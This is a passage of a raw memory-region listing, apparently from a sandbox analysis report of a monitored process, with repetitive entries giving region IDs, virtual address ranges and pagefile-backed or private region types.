region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15263 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15264 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15265 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15266 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15267 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15268 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15269 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15270 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15271 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15272 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15275 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15276 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15297 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15298 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15299 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15300 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15301 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15324 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15325 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15326 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15327 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15328 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15329 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15330 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15331 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15332 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15333 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15337 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15338 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15339 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15340 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15341 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15342 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15343 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15344 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15345 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15346 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15347 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15348 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15349 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15368 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15369 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15370 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15371 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15389 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15390 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15408 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15412 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15413 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15414 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15428 start_va = 0x610000 end_va = 0x61efff monitored = 